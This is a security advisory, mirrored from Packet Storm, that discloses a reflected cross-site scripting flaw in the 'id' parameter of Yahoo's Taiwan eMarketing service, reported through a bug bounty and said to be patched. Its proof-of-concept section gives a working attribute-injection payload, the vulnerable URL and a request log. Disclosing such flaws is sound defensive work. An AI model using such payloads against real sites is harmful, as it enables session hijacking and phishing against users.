Lucene search

K
packetstormHadji SamirPACKETSTORM:131818
HistoryMay 07, 2015 - 12:00 a.m.

Yahoo eMarketing Cross Site Scripting

2015-05-0700:00:00
Hadji Samir
packetstormsecurity.com
27
`Document Title:  
===============  
Yahoo eMarketing Bug Bounty #31 - Cross Site Scripting Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=1491  
  
Yahoo Security ID (H1): #55395   
  
  
Release Date:  
=============  
2015-05-07  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1491  
  
  
Common Vulnerability Scoring System:  
====================================  
3.3  
  
  
Product & Service Introduction:  
===============================  
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely   
known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail,   
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports   
and its social media website. It is one of the most popular sites in the United States. According to news sources,   
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a   
billion consumers every month in more than 30 languages.  
  
(Copy of the Vendor Homepage: http://www.yahoo.com )  
  
  
Abstract Advisory Information:  
==============================  
The Vulnerability Laboratory Core Research Team discovered a client-side cross site scripting web vulnerability in the official Yahoo eMarketing online service web-application.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2015-05-03: Vendor Notification (Yahoo Security Team - Bug Bounty Program)  
2015-05-05: Vendor Response/Feedback (Yahoo Security Team - Bug Bounty Program)  
2015-05-06: Vendor Fix/Patch (Yahoo Developer Team)  
2015-05-06: Bug Bounty Reward (Yahoo Security Team - Bug Bounty Program)  
2015-05-07: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
Technical Details & Description:  
================================  
A non-persistent input validation web vulnerability has been discovered in the official Yahoo eMarketing online service web-application.  
The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise user/admin session information.  
  
The vulnerability is located in the `id` value of the `eMarketing` module. Remote attackers are able to inject malicious script codes to client-side GET method   
application requests. Remote attackers are able to prepare special crafted web-links to execute client-side script code that compromises the yahoo user/admin   
session data. The execution of the script code occurs in same module context location by a mouse-over. The attack vector of the vulnerability is located on the   
client-side of the online service and the request method to inject or execute the code is GET.  
  
The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.  
Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction.   
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load   
of malicious script codes or non-persistent web module context manipulation.  
  
Request Method(s):  
[+] GET  
  
Vulnerable Module(s):  
[+] Yahoo > eMarketing  
  
Vulnerable Parameter(s):  
[+] id  
  
  
Proof of Concept (PoC):  
=======================  
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click).  
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.  
  
PoC Payload(s): "onmouseenter="confirm(document.domain) (https://marketing.tw.campaign.yahoo.net/)  
  
PoC: eMarketing ID  
<br/>  
<table border="0" cellspacing="0" cellpadding="0" width="100%">  
<tr>  
<td align="right" width="10%" >  
<div class="fb-like" style="overflow: hidden; " data-href="http://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id="onmouseenter="confirm(document.domain)" data-layout="button_count" data-action="recommend" data-show-faces="false" data-share="true"></div>  
</td>  
<td align="left" valign="bottom" width="65%" >  
<span style="font-size:12px; margin: 2px; font-weight:bold; color:#4d0079">่ฆบๅพ—้€™็ฏ‡ๆ–‡็ซ ๆœ‰ๅนซๅŠฉ๏ผŸ ๅˆ†ไบซ็ตฆๆ›ดๅคš้ ญๅฎถ๏ผ</span>  
</td>  
</tr>  
</table>  
  
  
--- PoC Session Logs [GET] ---  
Status: 200[OK]  
GET https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id=%22onmouseenter=%22confirm(document.domain)   
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]  
Request Headers:  
Host[marketing.tw.campaign.yahoo.net]  
User-Agent[Mozilla/5.0 (X11; Linux i686; rv:37.0) Gecko/20100101 Firefox/37.0]  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[en-US,en;q=0.5]  
Accept-Encoding[gzip, deflate]  
Cookie[_ga=GA1.5.1632823259.1428499428; s_pers=%20s_fid%3D66FF8BBF1D4DB480-10779CBEBDA57A64%7C1491837590956%3B%20s_vs%3D1%7C1428680990957%3B%20s_nr%3D1428679190961-New%7C1460215190961%3B; __qca=P0-870655898-1430085821750; _ga=GA1.2.1969841862.1430892005]  
X-Forwarded-For[8.8.8.8]  
Connection[keep-alive]  
Response Headers:  
Date[Wed, 06 May 2015 12:19:05 GMT]  
Server[ATS]  
X-Powered-By[PHP/5.3.27]  
Content-Type[text/html]  
Age[0]  
Connection[close]  
Via[http/1.1 leonpc (ApacheTrafficServer/4.2.0 [c sSf ])]  
  
Reference(s):  
https://marketing.tw.campaign.yahoo.net  
https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/  
https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id=  
  
  
Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by a secure parse and encode of the vulnerable id value in the emarketing service application of yahoo.  
Restrict the input and disallow special chars or script code tags to prevent further injection attacks.  
  
  
Security Risk:  
==============  
The security risk of the client-side cross site scripting web vulnerability in the tw yahoo application is estimated as medium. (CVSS 3.3)  
  
  
Credits & Authors:  
==================  
Vulnerability Laboratory [Research Team] - Hadji Samir [[email protected]]  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed   
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable   
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab   
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for   
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,   
policies, deface websites, hack into databases or trade with fraud/stolen material.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com  
Contact: [email protected] - [email protected] - [email protected]  
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact  
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/  
  
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to   
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by   
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website   
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact   
([email protected] or [email protected]) to get a permission.  
  
Copyright ยฉ 2015 | Vulnerability Laboratory - [Evolution Security GmbH]โ„ข  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
CONTACT: [email protected]  
PGP KEY: http://www.vulnerability-lab.com/keys/[email protected]%280x198E9928%29.txt  
  
`